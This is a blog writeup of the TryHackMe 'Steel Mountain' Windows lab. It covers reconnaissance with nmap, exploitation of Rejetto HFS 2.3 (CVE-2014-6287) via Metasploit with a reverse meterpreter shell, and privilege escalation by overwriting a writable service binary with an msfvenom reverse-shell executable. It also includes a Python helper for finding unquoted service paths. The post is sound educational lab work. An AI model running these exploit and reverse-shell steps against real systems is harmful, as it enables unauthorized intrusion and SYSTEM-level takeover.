Writeup Tryhackme Steel Mountain
This is the first post about TryHackMe, a guided and more relaxed hacking platform than HTB, in my opinion.
I am totally new to this hacking platform and I am doing the Offensive Pentesting path (Advanced Exploitation section) just for fun. I am not sure whether TryHackMe allows posting writeups, because I could not find any information about this, so if it is forbidden please contact me.
Note: some sensitive information such as IPs and full flags is replaced with π, and the answers are not in the TryHackMe format. Just to sleep better.
So, on to the writeup.
0 - Basic info
Windows machine
1 - Reconnaissance and enumeration
Starting with an nmap scan (SYN scan, version detection, default plus vuln scripts, OS detection, all 65535 ports; the full run took about 14 minutes, which is the price of -p- combined with the vuln script category):
sudo nmap -sS -sV -sC -O -p- --script vuln 10.10.π
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 17:46 CEST
Nmap scan report for 10.10.π
Host is up (0.040s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/8.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_sslv2-drown:
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
8080/tcp open http HttpFileServer httpd 2.3
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-method-tamper:
| VULNERABLE:
| Authentication bypass by HTTP verb tampering
| State: VULNERABLE (Exploitable)
| This web server contains password protected resources vulnerable to authentication bypass
| vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
| common HTTP methods and in misconfigured .htaccess files.
|
| Extra information:
|
| URIs suspected to be vulnerable to HTTP verb tampering:
| /~login [GENERIC]
|
| References:
| http://www.imperva.com/resources/glossary/http_verb_tampering.html
| http://www.mkit.com.ar/labs/htexploit/
| https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|_ http://capec.mitre.org/data/definitions/274.html
|_http-server-header: HFS 2.3
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 BID:49303
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://seclists.org/fulldisclosure/2011/Aug/175
| https://www.tenable.com/plugins/nessus/55976
| https://www.securityfocus.com/bid/49303
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49163/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/26%OT=80%CT=1%CU=36036%PV=Y%DS=2%DC=I%G=Y%TM=60AE707
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M506NW8ST11%O2=M506NW8ST11%O3=M506NW8NNT11%O4=M506NW8ST11%O5=M5
OS:06NW8ST11%O6=M506ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M506NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: No accounts left to try
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 823.86 seconds
So there are several ports open: 80, 135, 139, 445, 3389, 5985, 8080, 47001 and a block of dynamic RPC ports (49152-49164). One note on the vuln script output: the http-vuln-cve2011-3192 hit on 8080 is a generic Range-header check that fires on any server honouring multi-range requests, and HFS is not Apache, so treat it as noise. The interesting banner is HttpFileServer httpd 2.3 on port 8080. First, browsing to the site on the default port 80 and looking at the page source:
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Steel Mountain</title>
<style>
* {font-family: Arial;}
</style>
</head>
<body><center>
<a href="index.html"><img src="/img/logo.png" style="width:500px;height:300px;"/></a>
<h3>Employee of the month</h3>
<img src="/img/BillHarper.png" style="width:200px;height:200px;"/>
</center>
</body>
</html>
Nothing of note apart from the image name BillHarper.png, which is a username hint (the user directory later turns out to be C:\Users\bill). Using the browser to check what is on port 8080:
Here we get the exact version, HttpFileServer 2.3; clicking the version link points to http://www.rejetto.com/hfs/
2 - Vulnerability Identification
A quick searchsploit query reveals that it is vulnerable to remote command execution:
searchsploit httpfileserver
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
Shellcodes: No Results
There is also a Metasploit module, exploit/windows/http/rejetto_hfs_exec.
Checking the exploit:
https://www.exploit-db.com/exploits/49125
The CVE is CVE-2014-6287: the findMacroMarker function in parserLib.pas, which is supposed to reject a search string that contains a macro, stops at a %00 byte, so anything placed after the null byte in ?search= is parsed as an HFS macro, and {.exec|...} runs an arbitrary program with the privileges of the HFS process.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287
3 - Exploit
Using Metasploit this time, to take it easy and live longer. I will try to mix Metasploit and manual exploitation depending on the energy I have on the day.
This is the module used with the configuration and payload set:
msf6 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.π yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST π yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Running the exploit. Note that the module also starts its own web server (SRVHOST/SRVPORT) from which the target fetches the VBS stager, so that address has to be reachable from the target network; on a VPN lab that means the tunnel interface, not the LAN address msfconsole prints as Local IP:
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on π :4444
[*] Using URL: http://0.0.0.0:8080/TtG31N2LZQ
[*] Local IP: http://192.168.1.84:8080/TtG31N2LZQ
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /TtG31N2LZQ
[*] Sending stage (175174 bytes) to 10.10.π
[!] Tried to delete %TEMP%\MUTmQHFQQU.vbs, unknown result
[*] Meterpreter session 3 opened (π :4444 -> 10.10.π:49254) at 2021-05-26 18:07:54 +0200
[*] Server stopped.
It worked. The user flag is on bill's desktop:
C:\Users\bill\Desktop
user.txt
b047π
4 - Post-Exploitation and privilege escalation
Now it is time to get root. I did not use the recommended tool, PowerUp; I used WinPEAS:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
[+] Interesting Services -non Microsoft-
[?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
AdvancedSystemCareService9(IObit - Advanced SystemCare Service 9)[C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe] - Auto - Running - No quotes and Space detected
File Permissions: bill [WriteData/CreateFiles]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\IObit\Advanced SystemCare (bill [WriteData/CreateFiles])
Advanced SystemCare Service
WinPEAS reports two separate things about AdvancedSystemCareService9. First, the service path is unquoted and contains spaces, the classic unquoted-service-path issue, which only helps if one of the directories along the path is writable. Second, and simpler, the service binary ASCService.exe itself (and its folder) is writable by bill. The second finding is enough on its own, so my approach was just to replace the file with a reverse shell executable: the service starts automatically and, as the getuid at the end shows, runs as NT AUTHORITY\SYSTEM, so whatever binary sits at that path runs as SYSTEM the next time the service starts.
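What the "No quotes and Space detected" line actually means, as an added illustration that is not part of the original post or of WinPEAS: when a service path is unquoted, CreateProcess splits it at each space and tries the prefixes in order, so a binary dropped at any earlier candidate is executed instead of the real one. The functions below are mine; the path is the one WinPEAS reported above, and the second sample path is a hypothetical one used only to show the argument case.

```python
import ntpath


def hijack_candidates(image_path: str) -> list:
    """Return the paths CreateProcess tries, in order, before the real binary.

    An unquoted ImagePath containing spaces is ambiguous: Windows splits the
    string at every space and, for each prefix, looks for <prefix>.exe until
    one exists (.exe is appended when the prefix has no extension; this
    simplification always appends it).  Every earlier candidate that an
    unprivileged user can create is a privilege-escalation path.  A quoted
    path is unambiguous and yields no candidates.
    """
    if image_path.startswith('"'):
        return []
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break  # reached the real executable; the remaining tokens are arguments
        candidates.append(prefix + ".exe")
    return candidates


def directories_to_check(image_path: str) -> list:
    """Directories where write access turns a candidate into a hijack."""
    seen = []
    for cand in hijack_candidates(image_path):
        d = ntpath.dirname(cand)
        if d not in seen:
            seen.append(d)
    return seen


# Service path exactly as WinPEAS reported it on this box.
ASC_PATH = r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

if __name__ == "__main__":
    for c in hijack_candidates(ASC_PATH):
        print("would run first if present:", c)
    print("need write access in:", directories_to_check(ASC_PATH))
```

On this box the candidates are C:\Program.exe, C:\Program Files.exe and C:\Program Files (x86)\IObit\Advanced.exe, so the unquoted-path route needs write access to C:\ or to the IObit folder; WinPEAS shows bill can write to the latter, but overwriting ASCService.exe directly is the shorter route the writeup takes.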
msf6 exploit(windows/http/rejetto_hfs_exec) > msfvenom -p windows/shell_reverse_tcp LHOST=π LPORT=4433 -e x86/shikata_ga_nai -f exe -o ASCService.exe
After that a listener is needed, so I used the Metasploit module multi/handler. The handler's payload has to match what msfvenom produced: windows/shell_reverse_tcp is a stageless plain shell, so the handler should be set to that same payload (a handler expecting windows/meterpreter/reverse_tcp would try to push a meterpreter stage into what is really a cmd.exe connection), and LPORT must match as well (4433 here).
With the .exe generated, I uploaded it to the target with meterpreter's upload command (to C:\Users\bill\Desktop) and stopped the service.
C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
The service is stopped first because Windows keeps the image of a running executable locked, so overwriting ASCService.exe while the service is running fails with a sharing violation. Note also that sc stop returns immediately and prints the state it saw when the control was sent (still 4 RUNNING above); run sc query AdvancedSystemCareService9 and wait for STATE : 1 STOPPED before copying.
Copying the generated .exe over the service binary (keep a copy of the original first if you want to restore the service afterwards):
C:\Program Files (x86)\IObit\Advanced SystemCare>copy C:\Users\bill\Desktop\ASCService.exe ASCService.exe
copy C:\Users\bill\Desktop\ASCService.exe ASCService.exe
Overwrite ASCService.exe? (Yes/No/All): Yes
Yes
1 file(s) copied.
Starting the service again to trigger the .exe with the reverse shell:
C:\Program Files (x86)\IObit\Advanced SystemCare>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED with error 216.
sc reports a failure, which is expected: the msfvenom executable is a plain program, not a real service binary, so the Service Control Manager does not get a valid service start from it. The program is nevertheless executed as the service account, and the reverse shell connects to the listener. Building the payload with -f exe-service instead of -f exe produces a proper service executable and avoids the error.
Finally getting the admin flag:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cd /users/administrator/desktop
meterpreter > cat root.txt
9af5π
Thanks for reading!